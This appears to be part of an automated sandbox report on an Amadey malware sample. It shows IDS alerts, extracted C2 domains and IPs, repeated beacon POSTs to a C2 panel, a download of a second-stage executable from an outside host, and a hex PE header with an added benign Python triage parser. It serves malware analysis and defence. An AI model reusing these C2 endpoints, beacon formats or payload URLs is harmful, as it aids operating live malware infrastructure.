Source: Network traffic | Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:49750 -> 107.189.27.66:80
Source: Network traffic | Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:49736 -> 107.189.27.66:80
Source: Network traffic | Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:49772 -> 107.189.27.66:80
Source: Network traffic | Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:49748 -> 107.189.27.66:80
Source: Network traffic | Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:49734 -> 107.189.27.66:80
Source: Network traffic | Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:49762 -> 107.189.27.66:80
Source: Network traffic | Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:49740 -> 107.189.27.66:80
Source: Network traffic | Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:49709 -> 107.189.27.66:80
Source: Network traffic | Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:49701 -> 107.189.27.66:80
Source: Network traffic | Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:49790 -> 107.189.27.66:80
Source: Network traffic | Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:49782 -> 107.189.27.66:80
Source: Network traffic | Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:49784 -> 107.189.27.66:80
                          Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:49788 -> 107.189.27.66:80
                          Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:49768 -> 107.189.27.66:80
                          Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:49752 -> 107.189.27.66:80
                          Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:49774 -> 107.189.27.66:80
                          Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:49764 -> 107.189.27.66:80
                          Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:49766 -> 107.189.27.66:80
                          Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:49780 -> 107.189.27.66:80
                          Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:49738 -> 107.189.27.66:80
                          Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:49756 -> 107.189.27.66:80
                          Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:49744 -> 107.189.27.66:80
                          Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:49726 -> 107.189.27.66:80
                          Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:49796 -> 107.189.27.66:80
                          Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:49760 -> 107.189.27.66:80
                          Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:49776 -> 107.189.27.66:80
                          Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:49778 -> 107.189.27.66:80
                          Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:49754 -> 107.189.27.66:80
                          Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:49794 -> 107.189.27.66:80
                          Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:49786 -> 107.189.27.66:80
                          Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:49798 -> 107.189.27.66:80
                          Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:49758 -> 107.189.27.66:80
                          Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:49746 -> 107.189.27.66:80
                          Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:49792 -> 107.189.27.66:80
                          Source: Malware configuration extractorURLs: cobolrationumelawrtewarms.com/3ofn3jf3e2ljk/index.php
                          Source: Malware configuration extractorURLs: towerbingobongoboom.com
                          Source: Malware configuration extractorURLs: 62.60.226.86
                          Source: global trafficTCP traffic: 192.168.2.6:49694 -> 213.209.150.137:4000
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 07 Mar 2025 16:37:02 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Thu, 06 Mar 2025 19:26:28 GMTETag: "1a70c8-62fb17b808100"Accept-Ranges: bytesContent-Length: 1732808Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d3 a3 1d 93 97 c2 73 c0 97 c2 73 c0 97 c2 73 c0 19 dd 60 c0 cd c2 73 c0 6b e2 61 c0 96 c2 73 c0 52 69 63 68 97 c2 73 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 71 b8 bc 5b 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 05 0c 00 22 00 00 00 12 00 00 00 00 00 00 00 d0 43 00 00 10 00 00 00 40 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 44 00 00 04 00 00 2a c1 1a 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 56 70 00 00 6a 00 00 00 00 60 00 00 f0 01 00 00 00 00 00 00 00 00 00 00 00 46 1a 00 c8 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 50 00 00 00 10 00 00 00 18 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 f0 01 00 00 00 60 00 00 00 02 00 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 70 00 00 00 02 00 00 00 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 
50 29 00 00 80 00 00 00 02 00 00 00 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 79 75 78 66 73 63 64 77 00 f0 19 00 00 d0 29 00 00 f0 19 00 00 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6f 69 61 68 7a 67 6d 68 00 10 00 00 00 c0 43 00 00 06 00 00 00 1e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 d0 43 00 00 22 00 00 00 24 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
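The response above is the start of the 1,732,808-byte executable the sample fetched, and the captured bytes already cover the DOS header, PE/COFF header, optional header and the complete section table. The following parser is an added example, not part of the Joe Sandbox report: it transcribes that dump byte for byte (zero runs written as repetitions, trailing padding dropped) and applies the kind of checks behind the report's "PE file contains section with special chars" and "Detected unpacking (changes PE section rights)" signatures. The indicator names and the 16x virtual-to-raw size threshold are choices made here, not Joe Sandbox's.

```python
"""Parse and triage the PE headers captured in the hex 'Data Raw' dump above."""
import struct

# Byte-for-byte transcription of the start of the application/x-msdos-program response
# captured above. Runs of zero bytes are written as repetitions and the dump's trailing
# zero padding is dropped: the section table ends at file offset 0x2c8.
DUMP_HEX = "".join([
    # IMAGE_DOS_HEADER; e_lfanew at offset 0x3c is 0xb8
    "4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 ",
    "00 " * 28, "b8 00 00 00 ",
    # DOS stub and Rich header
    "0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f ",
    "74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ",
    "d3 a3 1d 93 97 c2 73 c0 97 c2 73 c0 97 c2 73 c0 19 dd 60 c0 cd c2 73 c0 6b e2 61 c0 96 c2 73 c0 ",
    "52 69 63 68 97 c2 73 c0 ", "00 " * 16,
    # PE signature and IMAGE_FILE_HEADER: i386, 7 sections, SizeOfOptionalHeader 0xe0
    "50 45 00 00 4c 01 07 00 71 b8 bc 5b 00 00 00 00 00 00 00 00 e0 00 0f 01 ",
    # IMAGE_OPTIONAL_HEADER32 up to the security data directory; the remaining directories are zero
    "0b 01 05 0c 00 22 00 00 00 12 00 00 00 00 00 00 00 d0 43 00 00 10 00 00 00 40 00 00 00 00 40 00 ",
    "00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 44 00 00 04 00 00 ",
    "2a c1 1a 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 ",
    "00 00 00 00 00 00 00 00 56 70 00 00 6a 00 00 00 00 60 00 00 f0 01 00 00 00 00 00 00 00 00 00 00 ",
    "00 46 1a 00 c8 2a 00 00 ", "00 " * 88,
    # seven IMAGE_SECTION_HEADERs, 40 bytes each
    "20 20 20 00 20 20 20 20 00 50 00 00 00 10 00 00 00 18 00 00 00 10 00 00 ", "00 " * 12, "40 00 00 e0 ",
    "2e 72 73 72 63 00 00 00 f0 01 00 00 00 60 00 00 00 02 00 00 00 28 00 00 ", "00 " * 12, "40 00 00 c0 ",
    "2e 69 64 61 74 61 20 20 00 10 00 00 00 70 00 00 00 02 00 00 00 2a 00 00 ", "00 " * 12, "40 00 00 c0 ",
    "20 20 20 20 20 20 20 20 00 50 29 00 00 80 00 00 00 02 00 00 00 2c 00 00 ", "00 " * 12, "40 00 00 e0 ",
    "79 75 78 66 73 63 64 77 00 f0 19 00 00 d0 29 00 00 f0 19 00 00 2e 00 00 ", "00 " * 12, "40 00 00 e0 ",
    "6f 69 61 68 7a 67 6d 68 00 10 00 00 00 c0 43 00 00 06 00 00 00 1e 1a 00 ", "00 " * 12, "40 00 00 e0 ",
    "2e 74 61 67 67 61 6e 74 00 30 00 00 00 d0 43 00 00 22 00 00 00 24 1a 00 ", "00 " * 12, "40 00 00 e0 ",
])
DUMP = bytes.fromhex(DUMP_HEX)

IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000
# Characters a linker-produced section name is expected to consist of (choice made here).
NAME_CHARS = set("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789._$")


def parse_pe(data):
    """Return the header fields and section table needed for a packer triage."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found at e_lfanew")
    machine, nsections, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    opt = e_lfanew + 24                      # optional header follows the 20-byte file header
    magic = struct.unpack_from("<H", data, opt)[0]
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]
    size_of_image = struct.unpack_from("<I", data, opt + 56)[0]
    sections = []
    off = opt + opt_size                     # section table starts right after the optional header
    for _ in range(nsections):
        raw_name, vsize, va, rawsize, rawptr, _, _, _, _, flags = struct.unpack_from("<8sIIIIIIHHI", data, off)
        sections.append({"name": raw_name.split(b"\0", 1)[0].decode("latin-1"), "vsize": vsize,
                         "va": va, "rawsize": rawsize, "rawptr": rawptr, "flags": flags})
        off += 40
    return {"machine": machine, "magic": magic, "entry_rva": entry_rva,
            "size_of_image": size_of_image, "sections": sections}


def section_for_rva(pe, rva):
    """Section whose in-memory range covers the RVA, or None."""
    for s in pe["sections"]:
        if s["va"] <= rva < s["va"] + max(s["vsize"], s["rawsize"]):
            return s
    return None


def triage(pe):
    """Packer indicators as (indicator, section name) pairs, in section order."""
    findings = []
    for s in pe["sections"]:
        if not s["name"] or any(c not in NAME_CHARS for c in s["name"]):
            findings.append(("special_chars_in_section_name", s["name"]))
        if s["vsize"] > 16 * max(s["rawsize"], 1):   # almost nothing on disk, a lot in memory
            findings.append(("virtual_size_far_exceeds_raw_size", s["name"]))
        if s["flags"] & IMAGE_SCN_MEM_EXECUTE and s["flags"] & IMAGE_SCN_MEM_WRITE:
            findings.append(("section_is_writable_and_executable", s["name"]))
    ep = section_for_rva(pe, pe["entry_rva"])
    if ep is None:
        findings.append(("entry_point_outside_all_sections", ""))
    elif ep is pe["sections"][-1]:
        findings.append(("entry_point_in_last_section", ep["name"]))
    return findings


if __name__ == "__main__":
    pe = parse_pe(DUMP)
    for s in pe["sections"]:
        print(f"{s['name']!r:12} va=0x{s['va']:06x} vsize=0x{s['vsize']:06x} "
              f"raw=0x{s['rawsize']:06x} @0x{s['rawptr']:06x} flags=0x{s['flags']:08x}")
    for indicator, name in triage(pe):
        print(f"{indicator}: {name!r}")
```

On this dump the section table is self-consistent (each section's raw data begins where the previous one ends, and the last one ends at 0x1a4600, exactly where the security data directory points), so the oddities are deliberate rather than corruption: three section names made of spaces, a 0x295000-byte section backed by only 0x200 bytes on disk, five sections mapped writable and executable, and an entry point in the final section rather than in the first code section.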
                          Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 160Cache-Control: no-cacheData Raw: 72 3d 45 32 46 37 32 33 38 36 45 34 32 41 46 41 34 46 33 36 37 45 43 34 30 43 34 38 32 43 37 32 33 32 46 37 34 38 45 32 39 38 46 43 36 34 31 36 44 30 38 39 33 34 30 39 30 36 41 32 45 42 46 39 36 31 30 32 37 39 34 41 46 41 31 37 45 34 43 41 44 43 33 44 44 42 45 30 45 41 42 42 46 45 39 30 32 41 45 45 45 38 34 45 34 38 46 31 33 44 35 34 38 33 32 37 42 33 37 31 46 44 31 38 39 30 30 33 44 34 43 35 35 42 45 32 34 34 35 43 34 35 42 34 41 32 41 41 37 45 30 36 39 41 46 42 44 36 43 34 Data Ascii: r=E2F72386E42AFA4F367EC40C482C7232F748E298FC6416D089340906A2EBF96102794AFA17E4CADC3DDBE0EABBFE902AEEE84E48F13D548327B371FD189003D4C55BE2445C45B4A2AA7E069AFBD6C4
                          Source: global trafficHTTP traffic detected: GET /files/dinnmamunms/cubrodriver.exe HTTP/1.1Host: 45.59.120.8
                          Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 32Cache-Control: no-cacheData Raw: 65 32 3d 31 30 30 30 30 38 34 30 31 30 30 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: e2=10000840100&unit=246122658369
                          Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 160Cache-Control: no-cacheData Raw: 72 3d 45 32 46 37 32 33 38 36 45 34 32 41 46 41 34 46 33 36 37 45 43 34 30 43 34 38 32 43 37 32 33 32 46 37 34 38 45 32 39 38 46 43 36 34 31 36 44 30 38 39 33 34 30 39 30 36 41 32 45 42 46 39 36 31 30 32 37 39 34 41 46 41 31 37 45 34 43 41 44 43 33 44 44 42 45 30 45 41 42 42 46 45 39 30 32 41 45 45 45 38 34 45 34 38 46 31 33 44 35 34 38 33 32 37 42 33 37 31 46 44 31 38 39 30 30 33 44 34 43 35 35 42 45 32 34 34 35 43 34 35 42 34 41 32 41 41 37 45 30 36 39 41 46 42 44 36 43 34 Data Ascii: r=E2F72386E42AFA4F367EC40C482C7232F748E298FC6416D089340906A2EBF96102794AFA17E4CADC3DDBE0EABBFE902AEEE84E48F13D548327B371FD189003D4C55BE2445C45B4A2AA7E069AFBD6C4
                          Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 160Cache-Control: no-cacheData Raw: 72 3d 45 32 46 37 32 33 38 36 45 34 32 41 46 41 34 46 33 36 37 45 43 34 30 43 34 38 32 43 37 32 33 32 46 37 34 38 45 32 39 38 46 43 36 34 31 36 44 30 38 39 33 34 30 39 30 36 41 32 45 42 46 39 36 31 30 32 37 39 34 41 46 41 31 37 45 34 43 41 44 43 33 44 44 42 45 30 45 41 42 42 46 45 39 30 32 41 45 45 45 38 34 45 34 38 46 31 33 44 35 34 38 33 32 37 42 33 37 31 46 44 31 38 39 30 30 33 44 34 43 35 35 42 45 32 34 34 35 43 34 35 42 34 41 32 41 41 37 45 30 36 39 41 46 42 44 36 43 34 Data Ascii: r=E2F72386E42AFA4F367EC40C482C7232F748E298FC6416D089340906A2EBF96102794AFA17E4CADC3DDBE0EABBFE902AEEE84E48F13D548327B371FD189003D4C55BE2445C45B4A2AA7E069AFBD6C4
                          Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 160Cache-Control: no-cacheData Raw: 72 3d 45 32 46 37 32 33 38 36 45 34 32 41 46 41 34 46 33 36 37 45 43 34 30 43 34 38 32 43 37 32 33 32 46 37 34 38 45 32 39 38 46 43 36 34 31 36 44 30 38 39 33 34 30 39 30 36 41 32 45 42 46 39 36 31 30 32 37 39 34 41 46 41 31 37 45 34 43 41 44 43 33 44 44 42 45 30 45 41 42 42 46 45 39 30 32 41 45 45 45 38 34 45 34 38 46 31 33 44 35 34 38 33 32 37 42 33 37 31 46 44 31 38 39 30 30 33 44 34 43 35 35 42 45 32 34 34 35 43 34 35 42 34 41 32 41 41 37 45 30 36 39 41 46 42 44 36 43 34 Data Ascii: r=E2F72386E42AFA4F367EC40C482C7232F748E298FC6416D089340906A2EBF96102794AFA17E4CADC3DDBE0EABBFE902AEEE84E48F13D548327B371FD189003D4C55BE2445C45B4A2AA7E069AFBD6C4
                          Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 160Cache-Control: no-cacheData Raw: 72 3d 45 32 46 37 32 33 38 36 45 34 32 41 46 41 34 46 33 36 37 45 43 34 30 43 34 38 32 43 37 32 33 32 46 37 34 38 45 32 39 38 46 43 36 34 31 36 44 30 38 39 33 34 30 39 30 36 41 32 45 42 46 39 36 31 30 32 37 39 34 41 46 41 31 37 45 34 43 41 44 43 33 44 44 42 45 30 45 41 42 42 46 45 39 30 32 41 45 45 45 38 34 45 34 38 46 31 33 44 35 34 38 33 32 37 42 33 37 31 46 44 31 38 39 30 30 33 44 34 43 35 35 42 45 32 34 34 35 43 34 35 42 34 41 32 41 41 37 45 30 36 39 41 46 42 44 36 43 34 Data Ascii: r=E2F72386E42AFA4F367EC40C482C7232F748E298FC6416D089340906A2EBF96102794AFA17E4CADC3DDBE0EABBFE902AEEE84E48F13D548327B371FD189003D4C55BE2445C45B4A2AA7E069AFBD6C4
                          Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 160Cache-Control: no-cacheData Raw: 72 3d 45 32 46 37 32 33 38 36 45 34 32 41 46 41 34 46 33 36 37 45 43 34 30 43 34 38 32 43 37 32 33 32 46 37 34 38 45 32 39 38 46 43 36 34 31 36 44 30 38 39 33 34 30 39 30 36 41 32 45 42 46 39 36 31 30 32 37 39 34 41 46 41 31 37 45 34 43 41 44 43 33 44 44 42 45 30 45 41 42 42 46 45 39 30 32 41 45 45 45 38 34 45 34 38 46 31 33 44 35 34 38 33 32 37 42 33 37 31 46 44 31 38 39 30 30 33 44 34 43 35 35 42 45 32 34 34 35 43 34 35 42 34 41 32 41 41 37 45 30 36 39 41 46 42 44 36 43 34 Data Ascii: r=E2F72386E42AFA4F367EC40C482C7232F748E298FC6416D089340906A2EBF96102794AFA17E4CADC3DDBE0EABBFE902AEEE84E48F13D548327B371FD189003D4C55BE2445C45B4A2AA7E069AFBD6C4
                          Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 160Cache-Control: no-cacheData Raw: 72 3d 45 32 46 37 32 33 38 36 45 34 32 41 46 41 34 46 33 36 37 45 43 34 30 43 34 38 32 43 37 32 33 32 46 37 34 38 45 32 39 38 46 43 36 34 31 36 44 30 38 39 33 34 30 39 30 36 41 32 45 42 46 39 36 31 30 32 37 39 34 41 46 41 31 37 45 34 43 41 44 43 33 44 44 42 45 30 45 41 42 42 46 45 39 30 32 41 45 45 45 38 34 45 34 38 46 31 33 44 35 34 38 33 32 37 42 33 37 31 46 44 31 38 39 30 30 33 44 34 43 35 35 42 45 32 34 34 35 43 34 35 42 34 41 32 41 41 37 45 30 36 39 41 46 42 44 36 43 34 Data Ascii: r=E2F72386E42AFA4F367EC40C482C7232F748E298FC6416D089340906A2EBF96102794AFA17E4CADC3DDBE0EABBFE902AEEE84E48F13D548327B371FD189003D4C55BE2445C45B4A2AA7E069AFBD6C4
                          Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 160Cache-Control: no-cacheData Raw: 72 3d 45 32 46 37 32 33 38 36 45 34 32 41 46 41 34 46 33 36 37 45 43 34 30 43 34 38 32 43 37 32 33 32 46 37 34 38 45 32 39 38 46 43 36 34 31 36 44 30 38 39 33 34 30 39 30 36 41 32 45 42 46 39 36 31 30 32 37 39 34 41 46 41 31 37 45 34 43 41 44 43 33 44 44 42 45 30 45 41 42 42 46 45 39 30 32 41 45 45 45 38 34 45 34 38 46 31 33 44 35 34 38 33 32 37 42 33 37 31 46 44 31 38 39 30 30 33 44 34 43 35 35 42 45 32 34 34 35 43 34 35 42 34 41 32 41 41 37 45 30 36 39 41 46 42 44 36 43 34 Data Ascii: r=E2F72386E42AFA4F367EC40C482C7232F748E298FC6416D089340906A2EBF96102794AFA17E4CADC3DDBE0EABBFE902AEEE84E48F13D548327B371FD189003D4C55BE2445C45B4A2AA7E069AFBD6C4
                          Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 160Cache-Control: no-cacheData Raw: 72 3d 45 32 46 37 32 33 38 36 45 34 32 41 46 41 34 46 33 36 37 45 43 34 30 43 34 38 32 43 37 32 33 32 46 37 34 38 45 32 39 38 46 43 36 34 31 36 44 30 38 39 33 34 30 39 30 36 41 32 45 42 46 39 36 31 30 32 37 39 34 41 46 41 31 37 45 34 43 41 44 43 33 44 44 42 45 30 45 41 42 42 46 45 39 30 32 41 45 45 45 38 34 45 34 38 46 31 33 44 35 34 38 33 32 37 42 33 37 31 46 44 31 38 39 30 30 33 44 34 43 35 35 42 45 32 34 34 35 43 34 35 42 34 41 32 41 41 37 45 30 36 39 41 46 42 44 36 43 34 Data Ascii: r=E2F72386E42AFA4F367EC40C482C7232F748E298FC6416D089340906A2EBF96102794AFA17E4CADC3DDBE0EABBFE902AEEE84E48F13D548327B371FD189003D4C55BE2445C45B4A2AA7E069AFBD6C4
                          Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
